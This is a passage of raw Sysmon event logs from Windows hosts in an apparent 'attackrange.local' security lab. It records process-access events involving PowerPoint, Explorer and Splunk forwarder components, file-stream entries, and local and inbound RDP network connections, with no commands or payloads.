Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+da7f1|C:\Windows\System32\windows.storage.dll+da993|C:\Windows\System32\windows.storage.dll+dae28|C:\Windows\System32\windows.storage.dll+db1db|C:\Windows\System32\windows.storage.dll+d1ab1|C:\Windows\System32\windows.storage.dll+d3426|C:\Windows\System32\windows.storage.dll+d3ca1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e6dc|C:\Windows\System32\SHELL32.dll+6e225|C:\Windows\System32\SHELL32.dll+6ed3d|C:\Windows\System32\SHELL32.dll+7235f|C:\Windows\System32\SHELL32.dll+13fb0e|C:\Windows\System32\SHELL32.dll+13f726|C:\Windows\System32\SHELL32.dll+13f1a3|C:\Windows\System32\SHELL32.dll+13edbb 10341000x800000000000000081567Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.184{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+da7d5|C:\Windows\System32\windows.storage.dll+da993|C:\Windows\System32\windows.storage.dll+dae28|C:\Windows\System32\windows.storage.dll+db1db|C:\Windows\System32\windows.storage.dll+d1ab1|C:\Windows\System32\windows.storage.dll+d3426|C:\Windows\System32\windows.storage.dll+d3ca1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e6dc|C:\Windows\System32\SHELL32.dll+6e225|C:\Windows\System32\SHELL32.dll+6ed3d|C:\Windows\System32\SHELL32.dll+7235f 10341000x800000000000000081566Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.184{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+da7d5|C:\Windows\System32\windows.storage.dll+da993|C:\Windows\System32\windows.storage.dll+dae28|C:\Windows\System32\windows.storage.dll+db1db|C:\Windows\System32\windows.storage.dll+d1ab1|C:\Windows\System32\windows.storage.dll+d3426|C:\Windows\System32\windows.storage.dll+d3ca1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e6dc|C:\Windows\System32\SHELL32.dll+6e225|C:\Windows\System32\SHELL32.dll+6ed3d|C:\Windows\System32\SHELL32.dll+7235f|C:\Windows\System32\SHELL32.dll+13fb0e 354300x800000000000000081565Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:06.539{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com59216-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000081564Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.106{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EC3B-607E-690F-00000000BB01}7016C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081563Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.106{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081562Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.106{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081561Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.106{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081560Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.106{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081559Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.106{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC3B-607E-690F-00000000BB01}7016C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081558Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.106{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EC3B-607E-690F-00000000BB01}7016C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081557Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:07.966{A7A01FEF-EC3B-607E-690F-00000000BB01}7016C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000050740Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:08.100{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4842ACA7C7C189C8F76777D1F32BE39A,SHA256=61D2B6CDC7B155630A1A1BCA3C942AD55D5E222E9164AF477F070CB31B5A45E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050739Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:08.037{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB2ADCF6DD9AEDFFB2C75630AA34AB2A,SHA256=5148588F405FB0CA885B26E5A981645BE5E4E51EF8CCAF414EF3C0C8C859CFAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081641Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:09.481{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81329217DA2BEBB2C663C2CA26BD0031,SHA256=F3A17EB395F59B8C56E2565ED6A64F46A23CC50FE77E96FED2E19954F46A0D64,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081640Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.382{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57638-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local389ldap 354300x800000000000000081639Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.382{A7A01FEF-B636-607E-2F00-00000000BB01}2892C:\Windows\System32\dfssvc.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57638-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local389ldap 354300x800000000000000081638Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.378{A7A01FEF-B622-607E-0100-00000000BB01}4SystemNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57637-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local445microsoft-ds 354300x800000000000000081637Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.378{A7A01FEF-B622-607E-0100-00000000BB01}4SystemNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57637-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local445microsoft-ds 354300x800000000000000081636Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.187{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57636-false10.0.1.12-8000- 354300x800000000000000081635Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:07.946{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-3178-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000050741Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:09.116{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=033514B5E21478FE5C2EE90BD4385117,SHA256=E73DAA6D9C3F7BB3B672D4A60BC1E8B1486FD918CA8E5B00F48E9242A6D69153,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081664Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:10.887{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=980831B6932BDE4EEF1189A9A34203FF,SHA256=1A7720DF3D15522FA3BC95B6C8D52C0E2E737A333F0A89A595BD93EAAF29EA40,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081663Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:10.340{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81cf7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BFF145)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x800000000000000081662Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:10.340{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81b7d|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\System32\SHELL32.dll+836c0|C:\Windows\System32\SHELL32.dll+835ed|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\comdlg32.dll+13ae4|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+15a0a7|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+159b88|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1f9da1|C:\Program Files\Microsoft Office\root\Office16\ppcore.dll+249657 10341000x800000000000000081661Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:10.340{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81af9|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\System32\SHELL32.dll+836c0|C:\Windows\System32\SHELL32.dll+835ed|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\comdlg32.dll+13ae4|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+15a0a7|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+159b88|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1f9da1|C:\Program Files\Microsoft Office\root\Office16\ppcore.dll+249657 10341000x800000000000000081660Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:10.340{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\System32\SHELL32.dll+836c0|C:\Windows\System32\SHELL32.dll+835ed|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\comdlg32.dll+13ae4 10341000x800000000000000081659Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:10.340{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\System32\SHELL32.dll+836c0|C:\Windows\System32\SHELL32.dll+835ed|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\comdlg32.dll+13ae4|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+15a0a7 354300x800000000000000081658Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.385{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57639-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local389ldap 354300x800000000000000081657Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.385{A7A01FEF-B636-607E-2F00-00000000BB01}2892C:\Windows\System32\dfssvc.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57639-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local389ldap 10341000x800000000000000081656Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:10.044{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81cf7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BFF145)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x800000000000000081655Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:10.044{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81b7d|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\comdlg32.dll+1e967|C:\Windows\System32\shlwapi.dll+9fc1|C:\Windows\System32\shlwapi.dll+9edd|C:\Windows\System32\shlwapi.dll+9d96|C:\Windows\System32\shlwapi.dll+9c0d|C:\Windows\System32\SHELL32.dll+13fd37|C:\Windows\System32\SHELL32.dll+13f1b8|C:\Windows\System32\SHELL32.dll+13edbb|C:\Windows\System32\SHELL32.dll+13ef27|C:\Windows\System32\SHELL32.dll+2e893d|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081654Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:10.044{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft 